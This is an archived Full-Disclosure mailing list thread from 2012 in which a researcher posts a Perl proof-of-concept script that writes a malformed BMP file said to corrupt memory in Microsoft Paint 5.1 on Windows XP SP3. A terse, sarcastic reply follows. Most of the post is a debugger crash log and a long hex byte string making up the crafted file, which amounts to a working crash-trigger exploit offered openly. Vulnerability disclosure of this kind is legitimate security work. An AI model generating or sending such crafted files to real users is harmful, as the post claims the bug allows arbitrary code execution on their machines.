lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Mon, 29 Oct 2012 14:20:31 -0400
From: Antony widmal <antony.widmal@...il.com>
To: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Microsoft Paint 5.1 memory corruption

Always a pleasure to do your homework.

On Mon, Oct 29, 2012 at 1:19 PM, kaveh ghaemmaghami <
kavehghaemmaghami@...glemail.com> wrote:

> Thank you for response and analyze
> Best Regards
> Kaveh Ghaemmaghami
>
> On Sat, Oct 27, 2012 at 3:14 PM, kaveh ghaemmaghami
> <kavehghaemmaghami@...glemail.com> wrote:
> > Hello list!
> >
> > I want to warn you about Microsoft Paint 5.1 memory corruption
> >
> > Be safe
> >
> > Kaveh Ghaemmaghami aka (coolkaveh)
> >
> >
> ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
> > #!/usr/bin/perl
> > #Title    :  Microsoft Paint 5.1 memory corruption
> > #Version  :  build 2600.xpsp Service Pack3
> > #Date     :  2012-10-21
> > #Vendor   :  http://www.microsoft.com
> > #Impact   :  Med/High
> > #Contact  :  coolkaveh [at] rocketmail.com
> > #Twitter  :  @coolkaveh
> > #tested   :  XP SP3 ENG
> > #Author   :  coolkaveh
> >
> #######################################################################################################
> > #Notice : for testing POC please run the Microsoft Pain under a
> > debugger and then open the POC file.
> > #----
> > #Bug :
> > #----
> > #Memory corruption during the handling of the bmp files a
> > context-dependent attacker can execute arbitrary code.
> >
> #######################################################################################################
> > #(844.cc4): Break instruction exception - code 80000003 (first chance)
> > #eax=7ffda000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004
> edi=00000005
> > #eip=7c90120e esp=00faffcc ebp=00fafff4 iopl=0         nv up ei pl zr na
> pe nc
> > #cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
> efl=00000246
> > #*** ERROR: Symbol file could not be found.  Defaulted to export
> > symbols for C:\WINDOWS\system32\ntdll.dll -
> > #ntdll!DbgBreakPoint:
> > #7c90120e cc              int     3
> > #0:005> g
> > #(844.e20): Access violation - code c0000005 (first chance)
> > #First chance exceptions are reported before any exception handling.
> > #This exception may be expected and handled.
> > #eax=000cab68 ebx=00000000 ecx=00000276 edx=000009d8 esi=000d5589
> edi=000cab68
> > #eip=77f2f118 esp=0007ef30 ebp=0007efb0 iopl=0         nv up ei pl nz na
> po nc
> > #cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
> efl=00010202
> > #*** ERROR: Symbol file could not be found.  Defaulted to export
> > symbols for C:\WINDOWS\system32\GDI32.dll -
> > #GDI32!DdEntry11+0x44:
> > #77f2f118 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
> > #0:000> k
> > #*** ERROR: Module load completed but symbols could not be loaded for
> > C:\WINDOWS\system32\mspaint.exe
> > #ChildEBP RetAddr
> > #WARNING: Stack unwind information not available. Following frames may
> be wrong.
> > #0007efb0 0101235e GDI32!DdEntry11+0x44
> > #0007f024 0100a666 mspaint+0x1235e
> > #0007f04c 0102284e mspaint+0xa666
> > #0007f07c 01022af6 mspaint+0x2284e
> > #*** ERROR: Symbol file could not be found.  Defaulted to export
> > symbols for C:\WINDOWS\system32\MFC42u.DLL -
> > #0007f100 5f801bc5 mspaint+0x22af6
> > #0007f120 5f801b36 MFC42u!Ordinal6370+0x22
> > #0007f180 5f802f6c MFC42u!Ordinal1108+0x91
> > #0007f1a4 5f810971 MFC42u!Ordinal5801+0x34
> > #0007f210 5f81424a MFC42u!Ordinal3944+0x5b
> > #0007f2b0 7c911066 MFC42u!Ordinal5190+0x14d
> > #0007f2b4 7c9101bb ntdll!wcsncpy+0xb07
> > #0007f2c8 7c910202 ntdll!RtlAllocateHeap+0x117
> > #0007f2f4 7c910202 ntdll!RtlAllocateHeap+0x15e
> > #0007f2f8 7c91017b ntdll!RtlAllocateHeap+0x15e
> > #0007f2fc 7c9101bb ntdll!RtlAllocateHeap+0xd7
> > #0007f300 00000000 ntdll!RtlAllocateHeap+0x117
> >
> #####################################################################################################################
> > my $poc =
> >
> "\x42\x4D\x4E\x0A\x00\x00\x00\x00\x00\x00\xC7\xBD\x00\x00\x28\x00\x00\x00\x46\x00\x00\x00\x46\x00\x00".
> >
> "\x00\x01\x00\x04\x00\x00\x00\x00\x00\xD8\x09\x00\x00\xC4\x0E\x00\x00\xC4\x0E\x00\x00\x00\x00\x00\x00".
> >
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80".
> >
> "\x00\x80\x00\x80\x80\x00\x00\x80\x80\x80\x00\xC0\xC0\xC0\x00\x00\x00\xFF\x00\x00\xFF\x00\x00\x00\xFF".
> >
> "\xFF\x00\xFF\x00\x00\x00\xFF\x00\xFF\x00\xFF\xFF\x00\x00\xFF\xFF\xFF\x00\x88\x88\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77\x88\x87\x78\x88\x88\x88\x88\x87\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\x88\x88\x88\x88\x88\xFF\x87\x70\x77\x71".
> >
> "\x77\x77\x77\x77\x77\x72\x78\x88\x77\x07\x88\x77\x77\x78\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF".
> >
> "\xFF\xFF\xFF\xFF\x88\x8F\xF8\xFF\xFF\x7F\xFF\xF7\x8F\x07\xF7\x8F\xF8\x07\x88\xFF\xF0\x78\xFF\x87\x77".
> >
> "\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\x88\xFF\x88\x8F\xFF\xFF\x8F\xF8\x87\x8F\x7F".
> >
> "\xF7\xFF\x8F\x80\x8F\xFF\xF7\x8F\xF8\xFF\x07\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xF8".
> >
> "\x8F\xF8\x88\x8F\xFF\x77\x8F\xF8\x84\x8F\xFF\xF7\xFF\x08\xF7\xFF\x7F\xF7\xFF\x47\x8F\x76\x00\x88\x88".
> >
> "\x88\x88\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xF8\x8F\x88\x88\x8F\xFF\x77\x8F\xFF\xF7\x8F\xFF\xF7\xFF\x08".
> >
> "\xF7\xF8\x0F\xF7\xF8\x07\x7F\x77\x00\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xFF\xF8\x88\x88".
> >
> "\x8F\xFF\x77\x8F\x87\x77\x8F\xF8\xF7\xFF\x7F\xF7\xFF\x07\x87\xFF\x77\x8F\x77\x00\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x88\xFF\xFF\xFF\xFF\xFF\x88\x88\x88\x8F\xFF\x77\xFF\xFF\xF8\x8F\x78\xF7\xFF\xFF\x87\xFF\x87".
> >
> "\x74\x8F\xFF\xF8\x78\x00\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xF8\x88\x88\x88\x8F\xFF\x78".
> >
> "\xFF\x88\x87\x88\x8F\xF8\xFF\x88\x8F\xFF\xFF\xF7\x7F\xF8\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88".
> >
> "\xFF\xFF\xFF\xFF\x88\x88\x88\x88\x8F\xF8\x7F\xFF\x88\x88\x88\xFF\xFF\xFF\xFF\xFF\xFF\xF8\x87\xFF\xFF".
> >
> "\xFF\xF8\x00\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\xFF\xF8\x88\x88\x88\x88\x8F\xFF\xFF\xF8\x88\x88".
> >
> "\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xF8\x00\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF".
> >
> "\x88\x88\x88\x88\x88\x88\xFF\xFF\x8F\x87\x77\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xF8\x00".
> >
> "\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\xF8\x88\x88\x88\x88\xFF\xFF\x88\x87\x77\x77\x8F\xFF".
> >
> "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\xFF\xF8".
> >
> "\x88\x88\x8F\xFF\xFF\x88\x87\x77\x77\x78\xFF\xFF\xFF\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xF8\x00\x88\x88\x88".
> >
> "\x88\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xFF\xF8\x88\x88\xFF\xFF\xF8\x88\x88\x87\x77\x77\xFF\xFF\x8F\xFF".
> >
> "\xFF\xFF\xFF\xFF\xFF\xFF\xF8\x00\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xF8\x88\x88\x8F\xFF".
> >
> "\xFF\xF8\x88\x88\x88\x88\x77\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xF8\x00\x88\x88\x88\x88\x88\x88".
> >
> "\x88\x88\xFF\xFF\xFF\xF8\x88\x88\x8F\xFF\xFF\xFF\x88\x88\x77\x88\x88\x87\x8F\xFF\xFF\xFF\xFF\xFF\xFF".
> >
> "\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\x88\x88\x88\xFF\xFF\xFF\xFF\xF8\x88\x88".
> >
> "\x78\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F".
> >
> "\xFF\x88\x88\xFF\xFF\xFF\xF8\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF".
> >
> "\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xF8\x88\x8F\xFF\xFF\xF8\xF8\x88\x88\x88\x87\x88\x88\x88".
> >
> "\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xF8\x8F\xFF".
> >
> "\xFF\xF8\x88\x88\x88\x88\x88\x77\x78\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88".
> >
> "\x88\x88\x88\x88\x88\x88\x88\x8F\xF8\xF8\x88\x88\x88\x88\x87\x31\x78\x88\x77\x77\x88\x88\x88\x88\xFF".
> >
> "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x8F\x88\x87\x88\x88\x88".
> >
> "\x88\x87\x33\x77\x77\x77\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88".
> >
> "\x88\x88\x88\x88\x88\xFF\x88\x77\x88\x88\x88\x88\x88\x87\x33\x77\x77\x88\x88\x88\x88\x8F\xFF\xFF\xFF".
> >
> "\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77\x78\x88\x88\x88\x88\x88\x88".
> >
> "\x87\x77\x77\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x88\x17\x78\x88\x88\x88\x88\x88\x88\x88\x77\x77\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF".
> >
> "\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x87\x37\x78\x88\x88\x88\x88\x88\x88\x88\x87\x77".
> >
> "\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77".
> >
> "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x87\x78\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88".
> >
> "\x00\x88\x88\x88\x88\x88\x88\x88\x88\xF8\x78\x87\x17\x77\x77\x77\x88\x88\x88\x88\x88\x87\x78\x88\x88".
> >
> "\x88\x7F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x78\x87\x77\x78".
> >
> "\x88\x77\x77\x88\x88\x88\x88\x88\x78\x88\x88\x77\x7F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88".
> >
> "\x88\x88\x88\x88\x88\x88\xF8\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x87\x88\x87\x77\x78\xF8".
> >
> "\x8F\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x88\x88\x88\x87\x87\x77\x77\x78\xF8\xFF\xFF\xFF\xFF\xFF\xFF\xF8\x88\x00\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x87\x77\x77\x77\x78\x88\xFF\xFF\xFF".
> >
> "\xFF\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x87\x78\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x87\x78\x88\x77\x88\xFF\xFF\xFF\xFF\xFF\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x87\x88\x87\x78\x88\xF8\xFF\xFF\xFF\xF8\x88\x88".
> >
> "\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77".
> >
> "\x88\x87\x78\x88\x8F\xFF\xFF\xFF\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x77\x88\x88\x88\x88\x88\x88\x87\x78\x87\x88\x88\x88\x8F\xF8\x88\x88\x88\x88\x88\x88\x88\x00".
> >
> "\x88\x88\x88\x88\x88\x88\x88\x8F\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x87\x77\x88\x77\x88\x77".
> >
> "\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x88\x88\x88\x88\x77\x77\x78\x88\x77\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88".
> >
> "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77\x77\x88\x87\x77\x78\x88\x88".
> >
> "\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x87\x77\x78\x88\x87\x77\x78\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x78".
> >
> "\x88\x88\x77\x77\x78\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77\x78\x88\x88\x78\x88\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x77\x88\x77\x77\x77\x77\x88\x88\x88\x78\x77\x78\x88\x88\x88".
> >
> "\x77\x87\x87\x88\x87\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x77\x88\x70\x77".
> >
> "\x00\x77\x88\x88\x88\x78\x87\x77\x78\x88\x88\x78\x77\x77\x78\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
> >
> "\x88\x00\x88\x88\x88\x88\x88\x77\x88\x87\x31\x17\x78\x88\x88\x88\x77\x60\x70\x37\x88\x87\x77\x77\x87".
> >
> "\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x77\x88\x87\x77\x77\x88\x88".
> >
> "\x88\x88\x71\x17\x17\x78\x88\x77\x77\x77\x77\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88".
> >
> "\x88\x88\x88\x88\x77\x78\x87\x78\x88\x88\x88\x88\x87\x88\x87\x88\x88\x87\x77\x77\x77\x77\x77\x78\x88".
> >
> "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x77\x78\x88\x88\x88\x88\x88\x88\x88\x77".
> >
> "\x88\x88\x88\x87\x77\x87\x77\x37\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88".
> >
> "\x88\x77\x78\x88\x88\x88\x88\x88\x88\x88\x88\x77\x78\x88\x77\x77\x77\x73\x37\x78\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x87\x78\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
> >
> "\x77\x77\x77\x73\x17\x78\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x87\x77".
> >
> "\x88\x88\x88\x88\x88\x88\xF8\x88\x88\x88\x87\x77\x77\x77\x71\x13\x77\x78\x88\x88\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x88\x00\x88\x88\x88\x88\x88\x87\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x87\x77\x77\x77".
> >
> "\x11\x13\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x87\x77\x88\x88\x88".
> >
> "\x88\x88\x88\x88\x88\x88\x88\x77\x77\x77\x73\x13\x37\x33\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
> >
> "\x00\x88\x88\x88\x88\x88\x88\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77\x77\x77\x33\x37\x77\x37".
> >
> "\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x77\x88\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x88\x87\x77\x77\x77\x33\x33\x73\x77\x38\x88\x88\x78\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88".
> >
> "\x88\x88\x88\x87\x87\x78\x88\x88\x88\x88\x88\x88\x88\x88\x87\x77\x77\x77\x73\x37\x37\x33\x37\x78\x87".
> >
> "\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x87\x77\x88\x88\x88\x88\x88\x88\x88\x88".
> >
> "\x77\x77\x77\x73\x73\x77\x77\x73\x37\x77\x77\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x77\x77\x88\x88\x88\x88\x88\x88\x87\x77\x77\x77\x77\x37\x77\x73\x33\x37\x78\x88\x88\x88\x88".
> >
> "\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x87\x77\x78\x88\x88\x88\x88\x88\x77\x77\x77\x77".
> >
> "\x77\x77\x77\x33\x33\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88".
> >
> "\x77\x77\x77\x88\x88\x88\x77\x77\x77\x77\x77\x77\x77\x31\x11\x33\x77\x88\x78\x88\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x77\x77\x77\x78\x77\x77\x77\x77\x77\x33\x37\x77\x73\x11".
> >
> "\x13\x13\x77\x78\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x77\x77\x77\x73".
> >
> "\x77\x73\x37\x77\x77\x77\x33\x33\x33\x31\x11\x11\x13\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00".
> >
> "\x88\x88\x88\x88\x88\x88\x88\x87\x77\x77\x73\x77\x73\x13\x77\x77\x73\x33\x33\x31\x33\x33\x33\x37\x88".
> >
> "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x87\x77\x77\x73\x77\x77\x33".
> >
> "\x37\x77\x73\x11\x11\x11\x33\x33\x33\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88".
> >
> "\x88\x88\x88\x88\x77\x87\x77\x77\x77\x77\x73\x33\x77\x11\x11\x11\x13\x33\x33\x33\x38\x88\x88\x88\x88".
> >
> "\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x77\x77\x77\x37\x77\x77\x11\x17\x71\x10".
> >
> "\x00\x33\x33\x33\x33\x33\x78\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\xF8\x88".
> >
> "\x88\x87\x77\x77\x37\x77\x73\x33\x77\x31\x10\x00\x01\x33\x33\x33\x33\x78\x88\x88\x88\x88\x88\x88\x88".
> >
> "\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\xF8\x88\x87\x77\x17\x77\x77\x77\x77\x73\x11\x11\x11\x11\x11".
> >
> "\x11\x33\x37\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x77".
> >
> "\x77\x87\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x78\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
> >
> "\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
> > "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00".
> > open(C, ">:raw", "poc.bmp");
> > print C $poc;
> > close(C);
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists